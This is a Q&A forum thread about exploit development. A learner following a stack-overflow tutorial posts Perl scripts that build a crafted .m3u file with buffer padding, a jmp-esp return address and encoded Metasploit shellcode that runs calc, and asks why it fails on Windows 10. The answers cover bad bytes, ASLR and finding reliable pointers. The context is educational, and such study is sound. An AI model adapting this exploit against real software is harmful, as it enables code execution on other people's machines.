Exploit Development - Shellcode Doesn't Work?

Question

I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit.

Firstly, I found the position of EIP was after the 26089 As (at 0016F454), and the ESP was 4 characters after EIP (at 0016F45C) according to the following code:

my $file= "eipcrash.m3u";
my $junk= "A" x 26089; 
my $eip = pack('V', 0x444444); 

my $shellcode = "\x90" x 4 ;

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);

Results: https://i.sstatic.net/LmPG8.png

I find the pointer to jmp-esp instruction by !mona find -type instr -s "jmp esp" -x X. I use 0x7457AC5B one.

Results: https://i.sstatic.net/iUoVY.png

I carefully made everything looked working. Finalized code:

my $file= "eipcrash.m3u";
my $junk= "A" x 26089; 
my $eip = pack('V', 0x7457AC5B); #0x6F90E8EC  0x1001B058       0x7457AC5B

my $shellcode = "\x90" x 4 ;

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Final results: https://i.sstatic.net/JSwKt.png

It just doesn't work! I believe that my EIP and position of shellcode are correct, so the problem might be the effectiveness of the shellcode. I tried shellcodes of launching calc.exe from a different website, but none worked.

Why isn't it working? I'm using Windows 10 x64. Please guide me since I've been stuck on this for weeks, and I have scrutinized similar problems' articles on the web. I've really got no idea.

Thanks in advance.

Answer 1

Did you check for bad bytes? Quite often certain bytes are used by file parsers as magic markers and can cause your shellcode to not be copied in full or translated to corrupt shell code. You can use the bytearray feature of mona to assist you with identifying bad bytes (https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/)

Answer 2

• Target OS:
  Watch out! ==> ASLR!!!
  In the tutorial, the target seems to be "Windows XP SP3 (En)", and he tested on a "Windows XP [Version 5.1.2600]".
  In the comments, there's a positive feedback of the procedure working on "Win7 Prof Ver 6.1.7600 English" with ASLR, even after reboot. And you are testing on Windows 10, obviously with ASLR.
  
• Reliability across Windows platforms:
  I confirm! You have indeed control over the EIP 0016F454 (we see "DDDD"), ESP points at 0016F45C(shellcode).
  Did you try different instructions? (jmp,call, or push-ret).
  You used 0x7457AC5B ==> "jmp-esp" in cfgmgr32.dll.
  Did you try 0x035bf23a ==> "jmp-esp" in MSRMCcodec02.dll?
  
• Try to find reliable pointers:
  pvefindaddr j -r esp -n -o (Immunity Debugger or anything). And it's always better to avoid "SafeSEH" and "ASLR".